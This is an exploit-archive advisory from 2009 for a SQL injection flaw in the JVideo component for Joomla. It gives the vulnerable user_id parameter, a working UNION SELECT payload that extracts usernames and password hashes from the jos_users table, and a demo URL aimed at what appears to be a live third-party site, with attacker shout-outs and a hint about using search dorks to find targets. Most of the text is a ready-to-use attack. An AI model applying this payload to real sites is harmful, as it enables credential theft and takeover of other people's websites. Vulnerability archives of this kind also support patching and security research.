Joomla! Component JVideo 0.3.x - SQL Injection

EDB-ID:

8821

CVE:

N/A




Platform:

PHP

Date:

2009-05-29


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jvideo (user_id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Greetz        :  d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0
[+] Vulnerability :  SQL injection
[+] Google Dork   :  imagine ;)
--------------------------------------------------
author       :     Russell...
author Email :     chipdebios[alt+64]gmail.com

###################################################

Example:
http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]


SQL code:
+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users


DEMO:


http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users

etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

<name>JVideo!</name>
<creationDate>September 2008</creationDate>
<author>Infinovision.com</author>
<authorEmail>team@infinovision.com</authorEmail>
<authorUrl>http://www.infinovision.com</authorUrl>
<copyright>Copyright 2008 Infinovision.com</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<version>0.3.11c Beta</version>
<description>JVideo! Component</description>

# milw0rm.com [2009-05-29]